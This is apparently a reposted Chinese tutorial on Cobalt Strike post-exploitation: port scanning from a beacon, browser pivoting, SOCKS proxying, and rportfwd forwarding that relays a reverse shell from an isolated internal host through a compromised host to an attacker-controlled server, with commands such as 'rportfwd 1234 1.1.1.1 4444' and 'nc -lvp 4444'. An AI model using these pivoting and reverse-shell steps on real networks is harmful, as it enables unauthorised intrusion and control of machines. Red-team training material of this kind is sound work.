Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

一、端口扫描

(1):右键beacon-->Explore-->Port Scan

(2):使用图形化界面进行端口扫描

(3):使用命令进行端口扫描

portscan IP段 445 arp 数据包大小

(1):查看beacon命令行

(2):查看目标视图

二、浏览器代理设置

(1):右键beacon-->Explore-->Browser Pivot

(2):配置代理端口

(3):配置成功

三、内置SOCKS模块

• 方法一:

(1):右键beacon-->Privoting-->SOCKS Server

(2):设置端口

(3):设置成功

如上图所示，这样就创建好了一个SOCKS代理。

• 方法二

socks port

这样就启动了一个SOCKS代理。

(1):View-->Proxy Pivots

(2):SOCKS代理如下

(1):停止所有SOCKS代理

socks stop

在对应的beacon中执行如上命令，可以停止该beacon中的所有代理。

(2):停止单个SOCKS代理

View-->Proxy Pivots

(1):第一种方法

直接使用浏览器添加一个SOCKS4代理(服务器选择Cobalt Strike团队服务器地址，端口就是上面指定的端口)。

(2):第二种方法

选择一个SOCKS代理，点击Tuunel，将生成的代码复制到Meatasploit控制台中。

(3):第三种方法

使用各种代理工具。在windows中使用SocksCap64等工具，在Linux中使用Proxychains、sSocks等工具。

四、rportfwd模块

         上述三台主机A、B和C，其中A主机是外网主机并且上面搭建了Cobalt Strike的团队服务器，B主机已经被控制并且和团队服务器互通，C主机也被控制但是不通外网，和团队服务器不通。因此可以在B主机上使用rportfwd来进行端口转发。

rportfwd [bind port] [forwad host] [forward port]rportfwd stop [bind port]

如果正向连接指定端口，可以使用端口转发来将被控制主机的本地端口转发到公网上，或者转发到团队服务器监听的端口上。在Cobalt Strike上选择一个beacon进入交互式，其中bind port为本机需要转发的本地端口，forward host为VPS或者团队服务器的IP，forward prot为VPS或团队服务器监听的端口。对应上图中，bind port就是主机B的端口，forward host就是1.1.1.1这个IP，forward port是1.1.1.1这个IP监听的端口。

(1):在主机A上进行监听

如果主机A是团队服务器，则可以在团队服务器上监听一个端口，如4444端口；如果主机A是VPS，可以使用nc-lvp 4444来监听4444这个端口。

(2):进行端口转发

打开CobaltStrike中的beacon列表，选择192.168.223.1这个beacon，在里面执行如下命令:

rportfwd 1234 1.1.1.1 4444这个1234端口就是等会生成的反弹shell的监听端口。

(3):生成反弹shell

注意:这块需要生成一个反弹shell，这个反弹shell需要在主机C上执行，反弹shell中的监听IP是主机B的IP(192.168.223.1)，监听端口是1234。

        整个流程是这样的，在主机C上执行反弹shell，反弹shell的IP是主机B的1234端口，因此将流量反弹到主机B的1234端口，由于rportfwd将主机B的1234端口的流量转发到了主机A的4444端口，因此流量被转发到主机A的4444端口，由于之前在cobalt Strike上监听了主机A的4444端口，因此在Cobalt Strike上得到了主机C的beacon。

原文始发于微信公众号（想走安全的小白）：Cobalt Strike系列五----Cobalt Strike端口扫描和浏览器代理